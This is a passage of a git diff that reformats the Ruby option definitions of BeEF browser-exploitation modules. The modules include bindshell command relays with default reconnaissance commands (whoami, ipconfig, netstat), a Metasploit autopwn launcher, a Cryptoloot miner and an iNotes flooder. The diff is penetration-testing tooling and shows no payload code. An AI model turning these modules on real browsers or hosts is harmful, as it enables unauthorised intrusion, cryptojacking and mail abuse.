@configuration.get("beef.extension.etag.enable"); - raise ArgumentError,'etag extension is disabled' if enable != true - @datastore.each do |input| - if input['name'] == "data" - @data = input['value'] - end - end - BeEF::Extension::ETag::ETagMessages.instance.messages.store(@command_id.to_i, @data.unpack("B*")[0]) + def pre_send + # gets the value configured in the module configuration by the user + @configuration = BeEF::Core::Configuration.instance + enable = @configuration.get('beef.extension.etag.enable') + raise ArgumentError, 'etag extension is disabled' if enable != true + + @datastore.each do |input| + @data = input['value'] if input['name'] == 'data' end + BeEF::Extension::ETag::ETagMessages.instance.messages.store(@command_id.to_i, @data.unpack1('B*')) + end - def post_execute - # gets the value of command_id from BeEF database and delete the message from Etag webserver "database" - cid = @datastore['cid'].to_i - BeEF::Extension::ETag::ETagMessages.instance.messages.delete(cid) - end + def post_execute + # gets the value of command_id from BeEF database and delete the message from Etag webserver "database" + cid = @datastore['cid'].to_i + BeEF::Extension::ETag::ETagMessages.instance.messages.delete(cid) + end end diff --git a/modules/ipec/inter_protocol_imap/module.rb b/modules/ipec/inter_protocol_imap/module.rb index a7a3bc827..380e22625 100644 --- a/modules/ipec/inter_protocol_imap/module.rb +++ b/modules/ipec/inter_protocol_imap/module.rb @@ -4,17 +4,15 @@ # See the file 'doc/COPYING' for copying permission # class Inter_protocol_imap < BeEF::Core::Command - def self.options - return [ - {'name' => 'server', 'ui_label' => 'IMAP Server', 'value' => '127.0.0.1'}, - {'name' => 'port', 'ui_label' => 'Port', 'value' => '220'}, - {'name' => 'commands', 'ui_label' => 'Commands', 'type' => 'textarea', 'value' => 'a01 login root password\na002 logout'} + [ + { 'name' => 'server', 'ui_label' => 'IMAP Server', 'value' => '127.0.0.1' }, + { 'name' => 'port', 'ui_label' => 'Port', 'value' => '220' }, + { 'name' => 'commands', 'ui_label' => 'Commands', 'type' => 'textarea', 'value' => 'a01 login root password\na002 logout' } ] end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/ipec/inter_protocol_irc/module.rb b/modules/ipec/inter_protocol_irc/module.rb index 0f2622e4a..a0993b87d 100644 --- a/modules/ipec/inter_protocol_irc/module.rb +++ b/modules/ipec/inter_protocol_irc/module.rb @@ -4,19 +4,17 @@ # See the file 'doc/COPYING' for copying permission # class Inter_protocol_irc < BeEF::Core::Command - def self.options - return [ - {'name' => 'rhost', 'ui_label' => 'IRC Server', 'value' => '127.0.0.1'}, - {'name' => 'rport', 'ui_label' => 'Port', 'value' => '6667'}, - {'name' => 'nick', 'ui_label' => 'Username', 'value' => 'user1234__'}, - {'name' => 'channel', 'ui_label' => 'Channel', 'value' => '#channel1'}, - {'name' => 'message', 'ui_label' => 'Message', 'value' => 'Message sent from the Browser Exploitation Framework!'} + [ + { 'name' => 'rhost', 'ui_label' => 'IRC Server', 'value' => '127.0.0.1' }, + { 'name' => 'rport', 'ui_label' => 'Port', 'value' => '6667' }, + { 'name' => 'nick', 'ui_label' => 'Username', 'value' => 'user1234__' }, + { 'name' => 'channel', 'ui_label' => 'Channel', 'value' => '#channel1' }, + { 'name' => 'message', 'ui_label' => 'Message', 'value' => 'Message sent from the Browser Exploitation Framework!' } ] end def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/ipec/inter_protocol_posix_bindshell/module.rb b/modules/ipec/inter_protocol_posix_bindshell/module.rb index 682238079..21e99f07d 100644 --- a/modules/ipec/inter_protocol_posix_bindshell/module.rb +++ b/modules/ipec/inter_protocol_posix_bindshell/module.rb @@ -3,66 +3,62 @@ # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # -=begin -[+] Summary: - -Using Inter-protocol Communication (IPC) the zombie browser will send commands to a listening POSIX shell bound on the target specified in the 'Target Address' input. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet. - -The command results are returned to the BeEF control panel. - -[+] Tested: - -o Working: - o Mozilla Firefox 6 - -o Not Working: - o Mozilla Firefox 6 with the NoScript extension - o Internet Explorer 8+ - o Chrome 13 - o Opera 11 - o Safari 5 - -[+] Notes: - -o The bindshell is closed once the module has completed. This is necessary otherwise the /bin/sh process will hang. To avoid this issue: - - o remove the last "& exit" portion of the JavaScript payload. Be aware that this will leave redundant /bin/sh processes running on the target system. - -o The NoScript extension for Firefox aborts the request when attempting to access a host on the internal network and displays the following warning: - - [ABE] Deny on {POST http://localhost:4444/index.html?&/bin/sh&& <<< about:blank - 7} - SYSTEM rule: - Site LOCAL - Accept from LOCAL - Deny - -o Internet Explorer is not supported as IE 8+ does not allow posting data to internal network addresses. Earlier versions of IE have not been tested. - -o Returning the shell command results is not supported in Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe. The shell commands are executed on the target shell however. - -o This module is incompatible with autorun. Upon completing the shell commands it will load the original hooked window in a child iframe resulting in an additional hook. This will result in an infinite loop if this module is set to autorun. - -=end +# [+] Summary: +# +# Using Inter-protocol Communication (IPC) the zombie browser will send commands to a listening POSIX shell bound on the target specified in the 'Target Address' input. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet. +# +# The command results are returned to the BeEF control panel. +# +# [+] Tested: +# +# o Working: +# o Mozilla Firefox 6 +# +# o Not Working: +# o Mozilla Firefox 6 with the NoScript extension +# o Internet Explorer 8+ +# o Chrome 13 +# o Opera 11 +# o Safari 5 +# +# [+] Notes: +# +# o The bindshell is closed once the module has completed. This is necessary otherwise the /bin/sh process will hang. To avoid this issue: +# +# o remove the last "& exit" portion of the JavaScript payload. Be aware that this will leave redundant /bin/sh processes running on the target system. +# +# o The NoScript extension for Firefox aborts the request when attempting to access a host on the internal network and displays the following warning: +# +# [ABE] Deny on {POST http://localhost:4444/index.html?&/bin/sh&& <<< about:blank - 7} +# SYSTEM rule: +# Site LOCAL +# Accept from LOCAL +# Deny +# +# o Internet Explorer is not supported as IE 8+ does not allow posting data to internal network addresses. Earlier versions of IE have not been tested. +# +# o Returning the shell command results is not supported in Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe. The shell commands are executed on the target shell however. +# +# o This module is incompatible with autorun. Upon completing the shell commands it will load the original hooked window in a child iframe resulting in an additional hook. This will result in an infinite loop if this module is set to autorun. +# class Inter_protocol_posix_bindshell < BeEF::Core::Command - def self.options - return [ - {'name'=>'ip', 'ui_label' => 'Target Address', 'value' => 'localhost'}, - {'name'=>'port', 'ui_label' => 'Target Port', 'value' => '4444'}, - {'name'=>'command_timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'}, - {'name'=>'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the semicolons are required to seperate commands', 'type'=>'textarea', 'value'=>'echo ID: ; id', 'width'=>'200px' }, - {'name'=>'result_size', 'ui_label'=>'Result Size', 'description'=>'Expected maximum size of the result in bytes','value'=>'1024'} + [ + { 'name' => 'ip', 'ui_label' => 'Target Address', 'value' => 'localhost' }, + { 'name' => 'port', 'ui_label' => 'Target Port', 'value' => '4444' }, + { 'name' => 'command_timeout', 'ui_label' => 'Timeout (s)', 'value' => '30' }, + { 'name' => 'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the semicolons are required to seperate commands', 'type' => 'textarea', + 'value' => 'echo ID: ; id', 'width' => '200px' }, + { 'name' => 'result_size', 'ui_label' => 'Result Size', 'description' => 'Expected maximum size of the result in bytes', 'value' => '1024' } ] end def post_execute content = {} - content['result'] = @datastore['result'] if not @datastore['result'].nil? - content['fail'] = @datastore['fail'] if not @datastore['fail'].nil? - if content.empty? - content['fail'] = 'No data was returned.' - end + content['result'] = @datastore['result'] unless @datastore['result'].nil? + content['fail'] = @datastore['fail'] unless @datastore['fail'].nil? + content['fail'] = 'No data was returned.' if content.empty? save content end end diff --git a/modules/ipec/inter_protocol_redis/module.rb b/modules/ipec/inter_protocol_redis/module.rb index 21e34c553..2bb08d081 100644 --- a/modules/ipec/inter_protocol_redis/module.rb +++ b/modules/ipec/inter_protocol_redis/module.rb @@ -4,21 +4,21 @@ # See the file 'doc/COPYING' for copying permission # class Inter_protocol_redis < BeEF::Core::Command - def self.options cmd = 'set server:name "BeEF says:\\\\nm00!"\\nquit\\n' - return [ - {'name'=>'rhost', 'ui_label'=>'Target Address', 'value'=>'127.0.0.1'}, - {'name'=>'rport', 'ui_label'=>'Target Port', 'value'=>'6379'}, - {'name'=>'timeout', 'ui_label'=>'Timeout (s)', 'value'=>'15'}, - {'name'=>'commands','ui_label'=>'Redis commands', 'description'=>"Enter Redis commands to execute. Note: Use '\\n' to seperate Redis commands and '\\\\n' for new lines.", 'type'=>'textarea', 'value'=>cmd, 'width'=>'200px' } + [ + { 'name' => 'rhost', 'ui_label' => 'Target Address', 'value' => '127.0.0.1' }, + { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '6379' }, + { 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15' }, + { 'name' => 'commands', 'ui_label' => 'Redis commands', 'description' => "Enter Redis commands to execute. Note: Use '\\n' to seperate Redis commands and '\\\\n' for new lines.", + 'type' => 'textarea', 'value' => cmd, 'width' => '200px' } ] end def post_execute content = {} - content['result'] = @datastore['result'] if not @datastore['result'].nil? - content['fail'] = @datastore['fail'] if not @datastore['fail'].nil? + content['result'] = @datastore['result'] unless @datastore['result'].nil? + content['fail'] = @datastore['fail'] unless @datastore['fail'].nil? save content end end diff --git a/modules/ipec/inter_protocol_win_bindshell/module.rb b/modules/ipec/inter_protocol_win_bindshell/module.rb index 8f2247ce6..9abc75bde 100644 --- a/modules/ipec/inter_protocol_win_bindshell/module.rb +++ b/modules/ipec/inter_protocol_win_bindshell/module.rb @@ -3,29 +3,27 @@ # Browser Exploitation Framework (BeEF) - http://beefproject.com # See the file 'doc/COPYING' for copying permission # -=begin -The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue: - - use the netcat persistent listen "-L" option rather than the listen "-l" option; or - - remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system. - -Returning the shell command results is not supported in Firefox ~16+, IE, Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe due to content-type restrictions. The shell commands are executed on the target shell however. -=end +# The bindshell is closed once the module has completed. This is necessary otherwise the cmd.exe process will hang. To avoid this issue: +# - use the netcat persistent listen "-L" option rather than the listen "-l" option; or +# - remove the "& exit" portion of the JavaScript payload. Be aware that this will leave redundant cmd.exe processes running on the target system. +# +# Returning the shell command results is not supported in Firefox ~16+, IE, Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe due to content-type restrictions. The shell commands are executed on the target shell however. class Inter_protocol_win_bindshell < BeEF::Core::Command - def self.options - return [ - {'name'=>'rhost', 'ui_label'=>'Target Address', 'value'=>'127.0.0.1'}, - {'name'=>'rport', 'ui_label'=>'Target Port', 'value'=>'4444'}, - {'name'=>'timeout', 'ui_label'=>'Timeout (s)', 'value'=>'30'}, - {'name'=>'commands','ui_label'=>'Shell Commands', 'description'=>'Enter shell commands to execute. Note: ampersands are required to seperate commands', 'type'=>'textarea', 'value'=>'echo User: & whoami & echo Directory Path: & pwd & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width'=>'200px' } + [ + { 'name' => 'rhost', 'ui_label' => 'Target Address', 'value' => '127.0.0.1' }, + { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '4444' }, + { 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '30' }, + { 'name' => 'commands', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: ampersands are required to seperate commands', 'type' => 'textarea', + 'value' => 'echo User: & whoami & echo Directory Path: & pwd & echo Directory Contents: & dir & echo HostName: & hostname & ipconfig & netstat -an', 'width' => '200px' } ] end def post_execute content = {} - content['result'] = @datastore['result'] if not @datastore['result'].nil? - content['fail'] = @datastore['fail'] if not @datastore['fail'].nil? + content['result'] = @datastore['result'] unless @datastore['result'].nil? + content['fail'] = @datastore['fail'] unless @datastore['fail'].nil? save content end end diff --git a/modules/ipec/s2c_dns_tunnel/module.rb b/modules/ipec/s2c_dns_tunnel/module.rb index 9a0e9a53f..8368954c5 100644 --- a/modules/ipec/s2c_dns_tunnel/module.rb +++ b/modules/ipec/s2c_dns_tunnel/module.rb @@ -4,45 +4,38 @@ # See the file 'doc/COPYING' for copying permission # class S2c_dns_tunnel < BeEF::Core::Command - def self.options - @configuration = BeEF::Core::Configuration.instance - zone = @configuration.get("beef.extension.s2c_dns_tunnel.zone"); - return [ - {'name' => 'payload_name', 'ui_label'=>'Payload Name', 'type' => 'text', 'width' => '400px', 'value' => 'dnsTunnelPayload'}, - {'name' => 'zone', 'ui_label'=>'Zone', 'type' => 'hidden', 'width' => '400px', 'value' => zone}, - {'name' => 'data', 'ui_label'=>'Message', 'type' => 'textarea', - 'value' => 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ' + - 'ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco ' + - 'laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in ' + - 'voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat ' + - 'non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.', - 'width' => '400px', 'height' => '100px'} - ] + zone = @configuration.get('beef.extension.s2c_dns_tunnel.zone') + [ + { 'name' => 'payload_name', 'ui_label' => 'Payload Name', 'type' => 'text', 'width' => '400px', 'value' => 'dnsTunnelPayload' }, + { 'name' => 'zone', 'ui_label' => 'Zone', 'type' => 'hidden', 'width' => '400px', 'value' => zone }, + { 'name' => 'data', 'ui_label' => 'Message', 'type' => 'textarea', + 'value' => 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ' \ + 'ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco ' \ + 'laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in ' \ + 'voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat ' \ + 'non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.', + 'width' => '400px', 'height' => '100px' } + ] end def pre_send @configuration = BeEF::Core::Configuration.instance - enable = @configuration.get("beef.extension.s2c_dns_tunnel.enable"); - raise ArgumentError,'s2c_dns_tunnel extension is disabled' if enable != true + enable = @configuration.get('beef.extension.s2c_dns_tunnel.enable') + raise ArgumentError, 's2c_dns_tunnel extension is disabled' if enable != true - # gets the value configured in the module configuration by the user + # gets the value configured in the module configuration by the user @datastore.each do |input| - if input['name'] == "data" - @data = input['value'] - end + @data = input['value'] if input['name'] == 'data' end - BeEF::Extension::ServerClientDnsTunnel::Server.instance.messages.store(@command_id.to_i ,@data.unpack("B*")[0]) + BeEF::Extension::ServerClientDnsTunnel::Server.instance.messages.store(@command_id.to_i, @data.unpack1('B*')) end def post_execute - # gets the value of command_id from BeEF database and delete the message from DNS "database" cid = @datastore['cid'].to_i BeEF::Extension::ServerClientDnsTunnel::Server.instance.messages.delete(cid) - end - end diff --git a/modules/metasploit/browser_autopwn/module.rb b/modules/metasploit/browser_autopwn/module.rb index 1a51f3e0a..918e2173a 100644 --- a/modules/metasploit/browser_autopwn/module.rb +++ b/modules/metasploit/browser_autopwn/module.rb @@ -4,27 +4,25 @@ # See the file 'doc/COPYING' for copying permission # class Browser_autopwn < BeEF::Core::Command + def self.options + @conf = BeEF::Core::Configuration.instance + @uri = 'Enter AutoPwn URL Here' - def self.options - @conf = BeEF::Core::Configuration.instance - @uri = 'Enter AutoPwn URL Here' - begin - if @conf.get('beef.extension.metasploit.enable') - host = @conf.get('beef.extension.metasploit.callback_host') - url = @conf.get('beef.extension.metasploit.autopwn_url') - @uri = "http://#{host}:8080/#{url}" - end - end - return [ - { 'name' => 'sploit_url', 'description' => 'The URL to exploit', 'ui_label' => 'Listener URL', 'value' => @uri, 'width'=>'200px' }, - ] + if @conf.get('beef.extension.metasploit.enable') + host = @conf.get('beef.extension.metasploit.callback_host') + url = @conf.get('beef.extension.metasploit.autopwn_url') + @uri = "http://#{host}:8080/#{url}" end + [ + { 'name' => 'sploit_url', 'description' => 'The URL to exploit', 'ui_label' => 'Listener URL', 'value' => @uri, 'width' => '200px' } + ] + end + # This method is being called when a hooked browser sends some # data back to the framework. # def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end - end diff --git a/modules/misc/blockui/module.rb b/modules/misc/blockui/module.rb index 01c2126b7..900751b8d 100644 --- a/modules/misc/blockui/module.rb +++ b/modules/misc/blockui/module.rb @@ -4,18 +4,17 @@ # See the file 'doc/COPYING' for copying permission # class Blockui < BeEF::Core::Command - def self.options - return [ - {'name' => 'message', 'ui_label' => 'Message', 'type' => 'textarea', 'value' => '

Please wait while your data is being saved...

', 'width' => '400px', 'height' => '100px' }, - {'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '30', 'width' => '400px' } + [ + { 'name' => 'message', 'ui_label' => 'Message', 'type' => 'textarea', 'value' => '

Please wait while your data is being saved...

', 'width' => '400px', + 'height' => '100px' }, + { 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '30', 'width' => '400px' } ] end - + def post_execute content = {} content['result'] = @datastore['result'] save content end - end diff --git a/modules/misc/cryptoloot_miner/module.rb b/modules/misc/cryptoloot_miner/module.rb index d1a8d8dba..858c32e33 100644 --- a/modules/misc/cryptoloot_miner/module.rb +++ b/modules/misc/cryptoloot_miner/module.rb @@ -10,20 +10,19 @@ class Cryptoloot_miner < BeEF::Core::Command def self.options - [{ 'name' => 'public_token', - 'description' => 'Public Token', - 'ui_label' => 'Public Token', - 'value' => 'ae5c906cfd37610626e86e25786866d6d2ff1c258d5f', - 'type' => 'text' - }, - { 'name' => 'report_interval', - 'description' => 'Report Interval (in seconds)', - 'ui_label' => 'Report Interval (s)', - 'value' => '30', - 'type' => 'text' - }] + [{ 'name' => 'public_token', + 'description' => 'Public Token', + 'ui_label' => 'Public Token', + 'value' => 'ae5c906cfd37610626e86e25786866d6d2ff1c258d5f', + 'type' => 'text' }, + { 'name' => 'report_interval', + 'description' => 'Report Interval (in seconds)', + 'ui_label' => 'Report Interval (s)', + 'value' => '30', + 'type' => 'text' }] end + def post_execute - save({'result' => @datastore['result']}) + save({ 'result' => @datastore['result'] }) end end diff --git a/modules/misc/ibm_inotes/extract_inotes_list/module.rb b/modules/misc/ibm_inotes/extract_inotes_list/module.rb index b320099c8..7c8b25eef 100644 --- a/modules/misc/ibm_inotes/extract_inotes_list/module.rb +++ b/modules/misc/ibm_inotes/extract_inotes_list/module.rb @@ -14,16 +14,16 @@ # limitations under the License. # class Extract_inotes_list < BeEF::Core::Command - def self.options - return [ - {'type' => 'label', 'html' => 'Provide date boundaries to retrieve a list of Notes:' }, - {'type' => 'textfield', 'name' => 'startdate', 'ui_label' => 'startdate yyyymmdd', 'value' => '20140101'}, - {'type' => 'textfield', 'name' => 'enddate', 'ui_label' => 'enddate yyyymmdd', 'value' => '20500101'}, - {'type' => 'textfield', 'name' => 'count', 'ui_label' => 'number of items returned', 'value' => '-1'}, + def self.options + [ + { 'type' => 'label', 'html' => 'Provide date boundaries to retrieve a list of Notes:' }, + { 'type' => 'textfield', 'name' => 'startdate', 'ui_label' => 'startdate yyyymmdd', 'value' => '20140101' }, + { 'type' => 'textfield', 'name' => 'enddate', 'ui_label' => 'enddate yyyymmdd', 'value' => '20500101' }, + { 'type' => 'textfield', 'name' => 'count', 'ui_label' => 'number of items returned', 'value' => '-1' } ] - end - def post_execute - save({'result' => @datastore['result']}) end + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/misc/ibm_inotes/inotes_flooder/module.rb b/modules/misc/ibm_inotes/inotes_flooder/module.rb index 039b3a1bb..487589468 100644 --- a/modules/misc/ibm_inotes/inotes_flooder/module.rb +++ b/modules/misc/ibm_inotes/inotes_flooder/module.rb @@ -14,17 +14,17 @@ # limitations under the License. # class Inotes_flooder < BeEF::Core::Command - def self.options - return [ - {'type' => 'label', 'html' => 'Send a note to someone with an attachment:' }, - {'type' => 'textfield', 'name' => 'to', 'ui_label' => 'TO', 'value' => ''}, - {'type' => 'textfield', 'name' => 'subject', 'ui_label' => 'Subject', 'value' => ''}, - {'name'=>'body', 'ui_label' => 'Body', 'type'=>'textarea', 'value'=>''}, - {'type' => 'textfield', 'name' => 'delay', 'ui_label' => 'Delay (ms)', 'value' => '100'} + def self.options + [ + { 'type' => 'label', 'html' => 'Send a note to someone with an attachment:' }, + { 'type' => 'textfield', 'name' => 'to', 'ui_label' => 'TO', 'value' => '' }, + { 'type' => 'textfield', 'name' => 'subject', 'ui_label' => 'Subject', 'value' => '' }, + { 'name' => 'body', 'ui_label' => 'Body', 'type' => 'textarea', 'value' => '' }, + { 'type' => 'textfield', 'name' => 'delay', 'ui_label' => 'Delay (ms)', 'value' => '100' } ] - end - def post_execute - save({'result' => @datastore['result']}) end + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/misc/ibm_inotes/read_inotes/module.rb b/modules/misc/ibm_inotes/read_inotes/module.rb index 48a66b3cf..b0b12d67d 100644 --- a/modules/misc/ibm_inotes/read_inotes/module.rb +++ b/modules/misc/ibm_inotes/read_inotes/module.rb @@ -14,14 +14,14 @@ # limitations under the License. # class Read_inotes < BeEF::Core::Command - def self.options - return [ - {'type' => 'label', 'html' => 'Provide unid to retrieve details of a Note:' }, - {'type' => 'textfield', 'name' => 'unid', 'ui_label' => 'notes unid', 'value' => '1'} + def self.options + [ + { 'type' => 'label', 'html' => 'Provide unid to retrieve details of a Note:' }, + { 'type' => 'textfield', 'name' => 'unid', 'ui_label' => 'notes unid', 'value' => '1' } ] - end - def post_execute - save({'result' => @datastore['result']}) end + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/misc/ibm_inotes/send_inotes/module.rb b/modules/misc/ibm_inotes/send_inotes/module.rb index 97b5c0149..d8d6dd192 100644 --- a/modules/misc/ibm_inotes/send_inotes/module.rb +++ b/modules/misc/ibm_inotes/send_inotes/module.rb @@ -14,16 +14,16 @@ # limitations under the License. # class Send_inotes < BeEF::Core::Command - def self.options - return [ - {'type' => 'label', 'html' => 'Send a note to someone:' }, - {'type' => 'textfield', 'name' => 'to', 'ui_label' => 'TO:', 'value' => ''}, - {'type' => 'textfield', 'name' => 'subject', 'ui_label' => 'Subject:', 'value' => ''}, - {'name'=>'body', 'ui_label' => 'Body', 'type'=>'textarea', 'value'=>''} + def self.options + [ + { 'type' => 'label', 'html' => 'Send a note to someone:' }, + { 'type' => 'textfield', 'name' => 'to', 'ui_label' => 'TO:', 'value' => '' }, + { 'type' => 'textfield', 'name' => 'subject', 'ui_label' => 'Subject:', 'value' => '' }, + { 'name' => 'body', 'ui_label' => 'Body', 'type' => 'textarea', 'value' => '' } ] - end - def post_execute - save({'result' => @datastore['result']}) end + def post_execute + save({ 'result' => @datastore['result'] }) + end end diff --git a/modules/misc/ibm_inotes/send_inotes_with_attachment/module.rb b/modules/misc/ibm_inotes/send_inotes_with_attachment/module.rb index dce70a826..564db0b96 100644 --- a/modules/misc/ibm_inotes/send_inotes_with_attachment/module.rb +++ b/modules/misc/ibm_inotes/send_inotes_with_attachment/module.rb @@ -14,18 +14,19 @@ # limitations under the License. # class Send_inotes_with_attachment < BeEF::Core::Command - def self.options - return [ - {'type' => 'label', 'html' => 'Send a note to someone with an attachment:' }, - {'type' => 'textfield', 'name' => 'to', 'ui_label' => 'TO', 'value' => ''}, - {'type' => 'textfield', 'name' => 'subject', 'ui_label' => 'Subject', 'value' => ''}, - {'name'=>'body', 'ui_label' => 'Body', 'type'=>'textarea', 'value'=>''}, - {'type' => 'textfield', 'name' => 'filename', 'ui_label' => 'Filename', 'value' => 'BeEF_logo.png'}, - {'type' => 'textarea', 'name' => 'filedata', 'ui_label' => 'Filedata', 'value' => '\x89\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\x00\x00\xc8\x00\x00\x00\x95\x08\x06\x00\x00\x00\x1d\x48\xb5\xb7\x00\x00\x00\x19\x74\x45\x58\x74\x53\x6f\x66\x74\x77\x61\x72\x65\x00\x41\x64\x6f\x62\x65\x20\x49\x6d\x61\x67\x65\x52\x65\x61\x64\x79\x71\xc9\x65\x3c\x00\x00\x33\x85\x49\x44\x41\x54\x78\xda\xec\x7d\x07\x58\x54\x67\xf6\xfe\x3b\x0d\x98\x01\x86\xde\xa5\x29\x88\x02\xf6\x1e\x4b\x34\xb1\x25\x96\x98\xa8\xe9\xc9\x66\x4b\x36\xed\x97\x6c\xda\x6e\xf6\x9f\x6c\x92\xcd\xa6\xec\xa6\x57\x63\xca\xa6\x6d\x62\x9a\x25\xc6\xde\x83\x15\x6c\x28\x28\x02\x82\x48\x47\x7a\x67\x60\x66\x98\xf9\x7f\xe7\xbb\x77\xe8\x20\xe0\x80\x83\xde\xf3\x78\x1e\x87\x3b\x77\xda\xbd\xdf\xfb\x9d\x7e\x8e\x0c\xae\xa1\x90\xa8\x15\x4d\x66\x7c\x13\xe3\x7f\x30\x6e\x94\x2e\xc7\xd5\x4d\x72\xe9\x12\xb4\xa3\x1b\x19\xff\x9d\xf1\x54\xe9\x52\x48\x24\x01\xa4\x35\xa9\x19\xdf\x22\x3e\x7e\x5e\xfc\x5b\x22\x09\x20\x12\x89\x34\x81\xf1\x30\x98\xcc\xf4\x78\x36\xe3\x3f\x4b\x97\x44\x02\x88\x44\xcd\x44\x6a\x95\x02\x72\x76\x59\x0c\xdc\xfc\x78\x81\xf1\x44\xe9\xb2\x48\x00\x91\x48\xa0\x70\xe8\x8d\x58\x30\x63\x32\xfc\xfd\xbc\x80\x7a\xa3\x3b\x64\xb2\xb7\xd9\x71\x57\xe9\xd2\x48\x00\xb9\xda\x49\xc5\x38\x08\x3a\x03\xe6\xcd\x9e\x85\x07\xee\xbd\x03\x68\x30\x80\xa9\x5b\xd3\xd8\xf1\xd7\xa5\xcb\x23\x01\xe4\x6a\x27\x7b\xc6\x5a\x7a\x50\x59\x59\x85\x17\x9e\x7f\x0a\xe3\x27\x8f\x04\xaa\xea\x20\xda\x22\x4f\x49\x97\x48\x02\xc8\xd5\x4c\x0a\x91\x51\x52\x5a\xc6\x0f\xbc\xfe\xca\x3f\xa0\x0d\x60\xaa\x56\x9d\x1e\x4c\xd5\x7a\x85\x1d\xba\x4f\xba\x4c\x12\x40\xae\x56\x62\xfa\x14\xea\x19\x10\x50\x70\xa1\x90\x1f\xb8\xee\xba\xe9\x78\xfe\xf1\x87\x98\xf2\xc5\x2e\x53\xbd\xc1\x81\x1d\xfa\x88\xf1\x22\xe9\x52\x49\x00\xb9\x1a\x89\xc0\x51\x06\x85\x0c\xe9\x99\x59\x30\x1a\x8d\xfc\xe0\xd3\x4f\x3d\x8c\x87\x7f\x7f\x27\x83\x0f\xfb\xbb\xd1\xe4\xc8\x0e\x7d\xcb\xf8\x66\xe9\x72\x49\x00\xb9\xda\xc8\x04\xb3\x39\x03\x4a\x05\xb2\x2e\x14\xe1\x6c\xea\xb9\xa6\x27\x56\x7c\xf8\x1f\x2c\xbd\xf9\x06\xa0\xa6\x81\x8c\x76\x17\x76\xe8\x6b\xc6\x77\x49\x97\xec\x6a\xd0\xbb\x1d\xdc\xa4\xab\xd0\x4c\x21\x50\xc8\x17\xea\x2a\x6b\x30\x38\x28\x00\xd7\x5c\x33\xa1\xe9\x89\x79\x73\x67\x21\xf9\x6c\x1a\x52\x13\x52\x01\x3b\xa5\x3d\x93\x36\x0c\x31\x20\x0b\x3e\x4e\xba\x6c\x12\x40\xae\x22\x35\x0b\x7f\x40\xad\x5e\xd9\x28\x33\xe1\xde\xbb\x6f\x6d\x7a\xc2\xc1\xc1\x1e\x4b\x16\xcf\x43\x52\x4a\x0a\x52\x08\x24\x0a\xb9\x8a\x49\x9b\x79\xec\x29\xba\x80\xfb\x45\x1b\x46\x22\x09\x20\x57\x34\x95\x82\x52\x4c\x64\xb2\xe0\xfc\x8a\x0a\x4c\x1a\x35\x02\x43\x86\x84\x34\x3d\xa9\x54\xa9\xb0\x64\xd1\x3c\x14\x15\x17\x23\xfe\xc4\x69\xc0\x68\x62\x07\xe5\x94\xfd\x3b\x51\x04\x49\x85\x74\x09\x25\x80\x5c\xc9\x44\x49\x58\x1e\x6c\xd1\xcf\x6d\x2c\xad\x81\xd1\x6c\xc4\xd2\x5b\x16\xb6\x3a\x81\x40\xb2\x88\x81\x44\x66\x32\x61\x5f\x42\x02\xcc\xe5\xb5\x4c\xbc\xa8\x06\xb3\xa7\xe8\xc4\x4c\xc6\x67\xa5\xcb\x28\x01\xe4\x4a\x97\x22\xb7\x40\x2e\xd7\xa6\xe6\xe6\x62\xea\xd8\x51\x08\x0d\x0d\x6e\x77\xd2\xcc\x6b\xaf\x41\x64\x70\x10\x8e\x9c\x4a\x44\x65\x5e\x29\xd9\x25\x94\x96\xb2\x0c\x42\x06\x70\x9c\xa4\x72\x49\x00\xb9\x92\x01\x42\xc6\xfa\x24\x53\x59\x0d\x2e\x14\x15\xe2\x9e\xbb\x96\x77\x78\x62\x54\xd4\x30\xcc\x9e\x39\x0d\xe9\xe7\x33\x90\x91\x7a\x1e\x68\x34\x2b\x18\x50\xa6\xb3\xa7\xe6\x32\x4e\x66\x9c\x2d\x5d\x4e\x09\x20\x57\x22\x91\xaa\x74\x07\x33\xc2\xd5\xe7\x32\x73\xe0\xa1\x75\xc6\xa4\x49\x63\x3b\x3c\xd1\xdb\xdb\x8b\x03\xa8\xa1\x5e\x87\x8